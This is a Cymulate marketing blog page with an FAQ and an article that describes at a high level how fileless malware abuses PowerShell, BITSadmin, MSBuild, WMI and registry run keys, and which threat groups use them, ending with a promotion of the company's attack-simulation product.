Frequently Asked Questions

Fileless Malware Attacks & Detection

What is a fileless malware attack?

Fileless malware attacks are cyberattacks that use legitimate system tools and in-memory execution techniques to perform malicious actions without dropping files to disk. This makes them notoriously difficult to detect, as they do not leave traditional file-based signatures and often evade legacy antivirus solutions. (Source: Cymulate Blog)

How do fileless attacks differ from traditional malware?

Unlike traditional malware, which is dropped to disk and executed from the hard drive, fileless attacks operate directly from system memory. This allows them to bypass signature-based antivirus solutions and makes detection much more challenging. (Source: Cymulate Blog)

Why are fileless malware attacks so difficult to detect?

Fileless malware attacks are difficult to detect because they use legitimate system tools and execute in memory, leaving no files on disk for traditional antivirus solutions to scan. Even advanced EDR solutions can be evaded by sophisticated attackers. (Source: Cymulate Blog)

What are some common tools and techniques used in fileless attacks?

Common tools and techniques include PowerShell, BITSadmin, MSBuild.exe, Windows Management Instrumentation (WMI), and Runonce registry keys. These are legitimate Windows utilities that attackers abuse to download payloads, move laterally, escalate privileges, and maintain persistence. (Source: Cymulate Blog)

Which threat groups are known for using fileless attack techniques?

Threat groups such as Leviathan, Tropic Trooper, APT3, MenuPass, Threat Group 3390, SoftCell, DragonOK, Deep Panda, APT41, APT29, OilRig, Lazarus Group, FIN6, and others have been observed using fileless attack techniques. (Source: Cymulate Blog)

How prevalent are fileless malware attacks?

Fileless malware attacks increased by 265% in 2019, highlighting their growing prevalence and the need for advanced detection and prevention strategies. (Source: Infosecurity Magazine)

What is the role of PowerShell in fileless attacks?

PowerShell is commonly used by attackers to download and execute payloads, install backdoors, move laterally, escalate privileges, and conduct reconnaissance. Virtually every APT group leverages PowerShell in their attack chains. (Source: Cymulate Blog)

How is BITSadmin abused in fileless attacks?

BITSadmin, a Windows Background Intelligent Transfer Service tool, is abused by attackers to download, execute, and clean up malicious code. It is used for data exfiltration, downloading backdoors, and maintaining persistence. (Source: Cymulate Blog)

What is the significance of MSBuild.exe in fileless attacks?

MSBuild.exe is a signed Microsoft binary used by attackers to bypass application whitelisting and execute arbitrary code. It is commonly used in attacks involving the Empire framework and PlugX RAT, and is favored by several APT groups. (Source: Cymulate Blog)

How do attackers use WMI in fileless attacks?

Windows Management Instrumentation (WMI) is used by attackers to bypass user account control, dump credentials, obfuscate data, disable security tools, copy files remotely, and enable lateral movement. WMI has been used in ransomware attacks like Olympic Destroyer, RobbinHood, NotPetya, and WannaCry. (Source: Cymulate Blog)

What is the Runonce technique in fileless attacks?

The Runonce technique involves abusing Windows Registry keys to establish persistence and execute malware under the user's context. Attackers add entries to 'run keys' or the startup folder, often masquerading as legitimate programs. (Source: Cymulate Blog)

How does Cymulate help organizations defend against fileless attacks?

Cymulate simulates fileless attacks using legitimate tools to run malicious commands, providing results tagged to the MITRE ATT&CK Framework. The platform offers actionable guidance on mitigation, detection, and analysis to help organizations strengthen their defenses. (Source: Cymulate Blog)

Where can I learn more about the MITRE ATT&CK Framework?

You can find additional details about fileless attack techniques and threat groups in the MITRE ATT&CK Framework section on Cymulate's website.

How does Cymulate Exposure Validation support security testing?

Cymulate Exposure Validation makes advanced security testing fast and easy, allowing users to build custom attack chains and validate their defenses against real-world threats in a single platform. (Source: Exposure Validation Data Sheet)

What customer feedback is available about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive and user-friendly platform. For example, Raphael Ferreira, Cybersecurity Manager, stated, "Cymulate is easy to implement and use—all you need to do is click a few buttons, and you receive a lot of practical insights into how you can improve your security posture." (Source: Customer Quotes)

How quickly can Cymulate be implemented?

Cymulate is designed for rapid deployment, operating in agentless mode with no need for additional hardware or complex configurations. Customers can start running simulations almost immediately after deployment. (Source: Knowledge Base)

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the chosen package, number of assets, and scenarios selected. For a detailed quote, you can schedule a demo with Cymulate's team. (Source: Knowledge Base)

What security certifications does Cymulate hold?

Cymulate holds several industry-leading certifications, including SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1. These certifications demonstrate Cymulate's commitment to robust security and compliance standards. (Source: Security at Cymulate)

How does Cymulate ensure data security and privacy?

Cymulate ensures data security through encryption for data in transit (TLS 1.2+) and at rest (AES-256), secure AWS-hosted data centers, a tested disaster recovery plan, and compliance with GDPR. The platform also features mandatory 2FA, RBAC, and IP address restrictions. (Source: Security at Cymulate)

What integrations does Cymulate offer?

Cymulate integrates with a wide range of security technologies, including Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, Cisco Secure Endpoint, CrowdStrike Falcon, Wiz, SentinelOne, and more. For a complete list, visit the Partnerships and Integrations page. (Source: Knowledge Base)

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams in organizations of all sizes and industries, including finance, healthcare, retail, media, transportation, and manufacturing. (Source: Knowledge Base)

What are the key features of Cymulate's platform?

Key features include continuous threat validation, unified platform for BAS, CART, and exposure analytics, attack path discovery, automated mitigation, AI-powered optimization, complete kill chain coverage, ease of use, and an extensive threat library with over 100,000 attack actions. (Source: Knowledge Base)

How does Cymulate compare to other security validation platforms?

Cymulate stands out with its unified platform combining BAS, CART, and exposure analytics, continuous 24/7 threat validation, AI-powered remediation prioritization, complete kill chain coverage, ease of use, and proven customer outcomes such as a 52% reduction in critical exposures and 81% reduction in cyber risk. (Source: Knowledge Base)

What problems does Cymulate solve for security teams?

Cymulate addresses challenges such as fragmented security tools, resource constraints, unclear risk prioritization, cloud complexity, communication barriers, inadequate threat simulation, operational inefficiencies in vulnerability management, and post-breach recovery challenges. (Source: Knowledge Base)

Are there case studies showing Cymulate's effectiveness?

Yes, for example, Hertz Israel reduced cyber risk by 81% in four months using Cymulate. Additional case studies are available on the Cymulate Customers page. (Source: Knowledge Base)

How does Cymulate support different security roles?

Cymulate provides tailored solutions for CISOs (metrics and risk prioritization), SecOps teams (automation and efficiency), red teams (automated offensive testing), and vulnerability management teams (in-house validation and prioritization). (Source: Knowledge Base)

Where can I find Cymulate's blog, newsroom, and resource hub?

You can find the latest insights, research, and product information on the Cymulate Blog, Newsroom, and Resource Hub. (Source: Knowledge Base)

How can I stay updated with Cymulate's latest news and events?

Stay informed by visiting the company blog, newsroom, and events and webinars page for the latest updates, research, and live sessions. (Source: Knowledge Base)

What is Cymulate's mission and vision?

Cymulate's mission is to transform cybersecurity practices by enabling organizations to proactively validate their defenses, identify vulnerabilities, and optimize their security posture. The vision is to create a collaborative environment for lasting improvements in cybersecurity strategies. (Source: About Us)

What is Attack Path Discovery and how does Cymulate support it?

Attack Path Discovery is a feature that helps assess lateral movement, identify exposures, and improve threat resilience. Cymulate provides automated testing for lateral movement and attack path discovery. (Source: Attack Path Discovery)

What types of attack simulations does Cymulate provide?

Cymulate provides a wide range of full kill-chain attack simulations, covering threats such as ransomware, malware, APT groups, CVEs, and MITRE ATT&CK TTPs, to give organizations complete visibility into their threat exposure. (Source: Knowledge Base)

Where can I find resources on preventing lateral movement attacks?

Cymulate offers a blog post titled 'Stopping Attackers in Their Tracks,' which discusses common lateral movement attacks and prevention strategies. Read it on the Cymulate blog. (Source: Knowledge Base)

Cymulate named a Customers' Choice in 2025 Gartner® Peer Insights™
Learn More
New Case Study: Credit Union Boosts Threat Prevention & Detection with Cymulate
Learn More
New Research: Cymulate Research Labs Discovers Token Validation Flaw
Learn More
An Inside Look at the Technology Behind Cymulate
Learn More
Book a Demo
Book a Demo

Fileless Malware Attacks: Key Operators

By: Cymulate

Last Updated: June 23, 2025

cymulate blog article

Notoriously difficult to detect, fileless malware uses system tools and in-memory execution techniques to do its damage. With fileless malware, adversaries don't have to create or install special tools to bypass defenses, conduct reconnaissance, deliver payloads, or execute malicious activity. Overall, fileless malware attacks increased 265% in 2019.

Fileless attacks have traditionally abused Windows OS tools or processes, but in December 2019, a fileless was detected. They contain malicious code hiding in memory of legitimate applications. And unlike file-based malware that is dropped to disk and run from the hard drive, fileless attacks are executed right from system memory. This characteristic makes it impossible for legacy, signature-based antivirus solutions to detect fileless attacks and to blacklist them. Although EDR solutions are increasingly built to detect these attacks, adversaries often evade those defenses as well.

The following list is a small sample of what's in the wild.  By understanding how they are used­—and by whom—you can defend against them. Additional details about each can be found at the MITRE ATT&CK Framework. 

PowerShell

PowerShell has been a mainstay of malware attacks for many years. Virtually every APT group uses it to download and execute payloads, install back doors and other tools, move laterally, escalate privileges, and conduct reconnaissance.

BITSadmin

The Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, file-transfer mechanism commonly used for background tasks such as updates and message delivery. Because BITS tasks are self-contained and don't require new files or registry modifications, firewalls usually permit them. Adversaries abuse BITS to download, execute, and clean up after running malicious code. BITS can be used to exfiltrate data, download backdoors and malicious payloads, download additional attack tools for lateral movement, and maintain persistence on a system.

The Leviathan cyber espionage group typically uses BITSadmin as it targets defense and government organizations, engineering firms, shipping and transportation, manufacturing, and research universities in the United States, Western Europe, and China. Tropic Trooper is another threat group that often uses BITSadmin in attacks on targets in Taiwan, the Philippines, and Hong Kong.

MSBuild.exe

Microsoft Build Engine (MSBuild.exe) is a developer utility that uses XML-formatted project files defining requirements for building various platforms and configurations. As a signed Microsoft binary, attackers use it to bypass application whitelisting defenses and insert code into XML files or execute arbitrary code. Attacks built on the Empire open-source remote administration and post-exploitation framework and the PlugX remote access tool (RAT) commonly use MSBuild.exe. Many different APT groups use this technique. Chinese threat groups such as APT3, MenuPass, Threat Group 3390, SoftCell, and others are well known, as is DragonOK—a threat group that has targeted Japanese organizations with phishing emails.

WMI

Windows Management Instrumentation (WMI) is a Windows feature that provides a uniform environment for local and remote access to Windows system components. For adversaries, it's a convenient tool for bypassing user account control, dumping credentials, obfuscating data, disabling security tools, copying files remotely, tainting shared content, enabling lateral movement, and delivering payload. WMI has been used in many infamous ransomware attacks, such as Olympic Destroyer, RobbinHood, NotPetya, and WannaCry. Trojans, such as Astaroth and Emotet, use WMI to execute payloads and other files. Chinese threat groups known for abusing WMI include Soft Cell, Deep Panda, and APT41, while Russian (APT29), Iranian (OilRig), North Korean (Lazarus Group), and cyber crime groups (FIN6) also make extensive use of WMI.

Runonce

Runonce abuses Windows Registry keys created by default on Windows systems. The fileless attack technique adds entries to "run keys" in the Registry or startup folder, causing malicious programs to run under the context of the user and his associated permissions. Registry run key entries can reference programs directly or list them as a dependency. Adversaries use Runonce to establish persistence, execute malware, and "masquerade" Registry entries to look like they are associated with legitimate programs. APT groups from China, Russia, Southeast Asia, Pakistan, Iran, and other countries have used Runonce tactics extensively via malware variants. Well-known variants include Carbanak, Cobalt Group, Emotet, Leviathan, Machete, TrickBot, XBash, and Zeus Panda.

Simulate Fileless Attacks to Boost Defenses

Cymulate simulates fileless attacks like those launched by real adversaries, using legitimate tools to run malicious commands. In each simulation, you receive results tagged to the MITRE ATT&CK Framework, where you can learn more about each threat. Cymulate goes beyond reporting to also provide you with additional guidance on mitigation, detection, and analysis.

 

image
Cymulate
Cymulate empowers organizations to fortify their defenses through continuous assessment and validation of their security posture. With a focus on threat simulation, comprehensive security assessments, and a commitment to innovation, Cymulate equips organizations with the tools and insights needed to stay ahead of cyber threats.
More about Author
Table of Contents
PowerShell WMI Runonce Simulate Fileless Attacks to Boost Defenses
Cymulate Exposure Validation makes advanced security testing fast and easy. When it comes to building custom attack chains, it's all right in front of you in one place.
Mike Humbert, Cybersecurity Engineer
DARLING INGREDIENTS INC.
Learn More

Featured Resources

View More Resources
Exposure Validation Demo
Demo

Exposure Validation Demo

Demo of automated offensive simulations validating detection, prevention, and IOC coverage

Learn More
Validate What Matters: Simulate Real-World Identity and Privilege Attacks in AD and Entra ID 
blog

Validate What Matters: Simulate Real-World Identity and Privilege Attacks in AD and Entra ID 

Identity is the new perimeter. The move to the cloud and remote work creates new security boundaries based on users and services operating across cloud and hybrid environments, making

Read More
New Cymulate WAF Rules: Turn Validation Gaps Into Actionable Defense 
blog

New Cymulate WAF Rules: Turn Validation Gaps Into Actionable Defense 

Yahav Levin, Research Team LeadIdan Sherman, Infosec Researcher Modern web applications are constantly exposed to threats such as SQL injection,

Read More

GET A PERSONALIZED DEMO

Ready to see Cymulate in action?

Book a Demo